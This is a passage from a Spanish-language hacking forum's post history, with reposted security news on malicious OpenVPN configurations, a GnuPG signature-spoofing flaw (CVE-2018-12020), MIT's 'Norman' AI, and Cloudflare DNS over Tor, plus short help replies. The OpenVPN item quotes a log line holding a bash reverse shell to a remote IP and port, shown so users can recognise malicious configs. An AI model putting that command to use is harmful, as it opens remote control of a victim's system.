Ahora que sabe que la configuración OpenVPN podría ser usada contra usted, usted puede preguntarse como comprobar si la configuración que usted usa es maliciosa.

Se pueden encontrar ciertas pistas en los logs de la conexión VPN como se muestra abajo:

Código: text

Thu Jun 7 12:28:23 2018 NOTE: the current — script-security setting may allow this configuration to call user-defined scripts
Thu Jun 7 12:28:23 2018 /bin/bash -c /bin/bash -i > /dev/tcp/192.168.1.218/8181 0<&1 2>&1& tun0 1500 1500 10.200.0.2 10.200.0.1 init

Si vemos estas líneas en su logs, esto significa que los ajustes fueron puestos en "script-security 2". Como esa linea es requerida para ejecutar scripts, esto seguirá siendo usado por el archivo de configuración.

Siendo las configuraciones OpenVPN simples archivos de texto, podemos verificarlos con algún editor de texto y asegurarnos que comandos están siendo ejecutados.

Lamentablemente el comando "up" no es el único que puede ser usado para objetivos maliciosos. "Up, down, client-connect, learn-address, auth-user-pass-verify, and learn-address" todos ejecutan comandos específicos de configuración.

FUENTE: BleepingComputer

#94

Noticias Informáticas / Un fallo en GnuPG permite a cualquiera suplantar cualquier firma digital

Junio 15, 2018, 11:31:50 AM

Una nueva vulnerabilidad afecta directamente a algunos clientes de cifrado de correos electrónicos. Se trata de un fallo crítico que ha sido descubierto por un investigador de seguridad que afirma que afecta a algunos de los más utilizados mundialmente que utilizan el estándar OpenPGP y confían en GnuPG para cifrar y firmar digitalmente todos los mensajes. Un problema bastante serio y que perjudica a muchos usuarios que confían en estas aplicaciones para, precisamente, aumentar su seguridad y privacidad.

Cualquier firma digital puede ser suplantada por un fallo en GnuPG

Hace un mes los investigadores de seguridad revelaron una serie de fallos y vulnerabilidades que denominaron eFail en GnuPG y herramientas de cifrado. Estos problemas podrían permitir a un hipotético atacante revelar correos electrónicos cifrados en texto plano. Esto, como hemos mencionado, afecta a una serie de servicios muy populares para los usuarios. Entre estos se encuentran Thunderbird, Outlook o Apple Mail.

Los atacantes, como descubrió el desarrollador Marcus Brinkmann, podrían falsificar firmas digitales con la clave pública de alguien.

La vulnerabilidad ha sido descrita como CVE-2018-12020 y afecta a aplicaciones de correo electrónico muy populares. Entre ellas se incluyen GnuPG, Enigmail, GPGTools y python-gnupg. Todas ellas han recibido actualizaciones de seguridad.

Marcus ha indicado que el protocolo OpenPGP permite incluir el parámetro "nombre de archivo" del archivo de entrada original en los mensajes firmados o cifrados, combinándolo con los mensajes de estado GnuPG (incluida la información de firma) en un único canal de datos agregando una palabra clave predefinida para separarlos.

Durante el descifrado del mensaje al destinatario final, la aplicación del cliente divide la información utilizando esa palabra clave y muestra el mensaje con una firma válida, si el usuario tiene habilitada la opción detallada en su archivo gpg.conf.

El problema es que ese nombre de archivo incluido que puede tener incluso 255 caracteres no se gestiona correctamente en estas aplicaciones que hemos mencionado. Esto es lo que, potencialmente, puede provocar que un atacante introduzca otros caracteres de control.

Falsificar firmas

Esto permitiría falsificar firmas. Se podría inyectar mensajes de estado GnuPG falsos y así falsificar la veracidad de las firmas y el resultado del descifrado de mensajes.

Los investigadores indican que un simple mensaje en texto plano sería un mensaje OpenPGP perfectamente válido y que puede contener el nombre del archivo cifrado en el ataque.

La recomendación, como suele ocurrir en estos casos, es actualizar cuanto antes el software.

FUENTE: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#95

Presentaciones y cumpleaños / Re:Saludos a todos... me presento

Junio 11, 2018, 07:45:50 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Me agrada mucho Undercode, me gusta leer y dar la mano cuando se puede.
Un saludo,

Frankivax

Bienvenido @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Vas por buen camino bro, Underc0de y leer es lo principal

Saludos!
K A I L

#96

Noticias Informáticas / Norman, la primera IA entrenada para "pensar" como un psicópata

Junio 07, 2018, 10:16:51 AM

Un grupo de investigadores del MIT acaba de mostrar los primeros resultados de un experimento por demás curioso, el cual consiste en una inteligencia artificial creada específicamente para tener "pensamientos" lo más cercanos a una mente psicópata.

Se trata de una red neuronal bautizada como 'Norman', en honor a Norman Bates de la mítica 'Psycho de Hitchcock. Esta plataforma fue entrenada de forma inusual al ser expuesta a los rincones más oscuros de internet, como subreddits centrados en asesinatos, cadáveres y otras imágenes perturbadoras.

Cuando los datos son más importantes que el algoritmo

Debido a esta formación inicial de 'Norman', se provocó que se desarrollaran tendencias psicópatas dentro del procesamiento de datos. Las primeras pruebas psicológicas mostraron patrones asociados con rasgos psicópatas en humanos, por lo que el primer paso había sido un éxito, 'Norman' era ya la primera IA psicópata.

Al estudiar los resultados, los investigadores del MIT describieron así a 'Norman': "Se trata de una IA psicótica que padece un trastorno alucinatorio crónico. Ha sido donada a la ciencia por el MIT Media Laboratory para el estudio de los peligros de la inteligencia artificial, demostrando cómo las cosas salen mal cuando se utilizan datos sesgados en algoritmos de machine learning".

Como parte de este experimento, otra inteligencia artificial "normal" fue entrenada con imágenes más benignas, como gatos, aves, naturaleza y personas. Después de esto, ambas IA se sometieron al test de Rorschach, que es una prueba utilizada por psicólogos que consiste en la interpretación de manchas de tinta, la cual sirve para comprender mejor y evaluar el estado de ánimo de un paciente.

Nuevamente, los resultados fueron por demás destacables. La visión de 'Norman' era deprimente, con asesinatos y violencia en cada imagen. Por otro lado, la "IA normal" sólo veía imágenes alegres en las mismas manchas de tinta.

Por ejemplo, mientras la "IA normal" veía un grupo de pájaros sobre la rama de un árbol, en la misma imagen 'Norman' veía a un hombre siendo electrocutado. En otra imagen, la "IA normal" veía un par de personas paradas una al lado de la otra, y 'Norman' veía a un hombre saltando desde una ventana.

El profesor Iyad Rahwan, uno de los creadores de 'Norman', explicó que este experimento nos demostraba como los datos son más importantes que el algoritmo, ya que los datos usados para entrenar a la IA reflejarán la forma en la que percibe al mundo y su comportamiento.

"si una IA está entrenada con datos malos, será mala."

'Norman' es apenas un experimento que busca demostrar los peligros de la inteligencia artificial, donde los datos sesgados y defectuosos pueden afectar de forma importante el resultado, lo cual aplica desde tareas básicas, por ejemplo de moderación, hasta robots automatizados.

Con todo esto, los investigadores aseguran que es un error culpar al algoritmo de los fallos de una inteligencia artificial, ya que el conjunto de datos de entrenamiento utilizados para dar vida a esta IA, es igual o más importante. En resumen, "si una IA está entrenada con datos malos, será mala".

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#97

Noticias Informáticas / Cloudflare lleva sus DNS 1.1.1.1 a la red Tor para ofrecer mayor anonimato

Junio 06, 2018, 01:48:10 PM

El pasado 1 de abril, Cloudflare, el mayor CDN actualmente de la red, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login: 1.1.1.1 y 1.0.0.1. Estos nuevos DNS prometen a los usuarios una privacidad muy superior a la que pueden ofrecernos otras alternativas como, por ejemplo, los DNS de Google, asegurando que no guardan ningún tipo de información de los usuarios y borrando todos los logs cada 24 horas. Sin embargo, aún hay usuarios que no se fían de esta privacidad y no les hace gracia revelar su IP a los servidores DNS. Y por ello, esta plataforma ha decidido ofrecer a los usuarios utilizar estos servidores a través de la red Tor.

Por muy privado que sea un servidor DNS, cuando el usuario le envía una solicitud refleja su dirección IP. Incluso cuando nos conectamos a la red Tor, al intentar resolver los nombres de dominio estamos utilizando este tipo de servidores, aunque según el tipo de solicitud que hagamos podemos mejorar más o menos nuestra privacidad, según si solicitemos la resolución al DNS antes de conectarnos a Tor (directamente con nuestra IP) o después de entrar a esta red (revelando la IP del nodo de salida de Tor, pero no la nuestra).

Así, Cloudflare ha habilitado un dominio de resolución gracias a los "Tor hidden services" habilitado un nuevo dominio .onion que hace referencia a su propio servidor DNS para que los usuarios puedan realizar las solicitudes desde allí:

Código: text

dns4torpnlfs2ifuz2s2yf3fc7rdmsbhm6rw75euj35pac6ap25zgqad.onion

Este dominio es el equivalente a utilizar la IP 1.1.1.1, o lo que es lo mismo pero más fácil de recordar, entrar al dominio You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, viendo en todos los casos la página principal del DNS en cuestión.

De esta manera, los usuarios que configuren su ordenador para utilizar estos DNS a través de Tor podrán tener un nuevo extra de privacidad a la hora de utilizar los DNS de Cloudflare, siendo estos ya completamente anónimos ya que, además de no guardar registros ni logs, podrán evitar que el servidor conozca sus direcciones IP reales sin necesidad de tener que redirigir todo su tráfico a través de Tor simplemente con unos 200 ms de retraso (aproximadamente) respecto a una solicitud DNS convencional.

Utilizar los DNS de Cloudflare a través de Tor no es algo precisamente sencillo

Por el momento, los DNS de Cloudflare a través de la red Tor se encuentra en una fase muy experimental y, además de funcionar solo en Firefox Nightly (ya que esta es la versión compatible con los encabezados Alt-Svc de HTTP y es la única que permite usar servicios .onion como recursos alternativos), su puesta en marcha es bastante complicada, teniendo que instalar manualmente el proxy Cloudflared para habilitar el uso de DNS sobre HTTPS y después iniciar un proxy Tor para reenviar el puerto TCP-443 a localhost, indicar al ordenador que trate la dirección .onion como localhost e iniciar un DNS local sobre UDP para poder resolver todas las direcciones DNS a través de su servidor en Tor.

Desde luego, un proceso nada intuitivo que esperamos que, cuando salga de su fase experimental, pueda ser mucho más simple para que cualquier usuario pueda ponerlo en marcha en su ordenador. Eso sí, no apto para entornos en producción, solo para pruebas (de momento).

¿Qué opinas de los servidores DNS de Cloudflare?

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#98

Off Topic / Re:Feliz cumple Blackdrake!!!!

Junio 05, 2018, 09:51:20 PM

Muy feliz cumpleaños @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login espero que estés pasando un gran día! !!

Abrazo grande!!

K A I L

#99

Dudas y pedidos generales / Re:Configuracion de Equipo

Junio 04, 2018, 09:49:45 PM

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Siempre utiliza entornos virtuales para hacer pruebas de hacking, de esa forma mantenés limpia tu computadora. También usar Sistemas en modo LIVE es una buena opción.

En cuanto a tu pregunta, y si tu duda tiene que ver con que usuario sería más seguro para no infectarse, es indiferente, muchos programas requieren privilegios de administrador para poder ser instalados, por lo que de cualquier forma te infectaría tu equipo, por eso para instalar programas de dudosa procedencia o solo para despejar cualquier posibilidad de infectar tu equipo, utiliza entornos virtuales cuando creas que sea necesario.

Espero haberte aclarado un poco tu duda.

Saludos!
K A I L

#100

Dudas y pedidos generales / Re:Error "modo Monitor" TL-WN722N

Mayo 31, 2018, 08:36:34 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias K A I L por el aporte del vídeo, he de decir que siguiendo el vídeo me he quedado atascado en el minuto 14:18 al ejecutar "make" me sale el error siguiente:

He actualizado todo el sistema.

Hola bro proba los siguiente:

Código: text

sudo apt-get update

Código: text

sudo apt-get upgrade

Código: text

sudo apt-get install linux-headers-$(uname -r)

Saludos!
K A I L

Páginas 1 ... 3 4 5 6 7 ... 10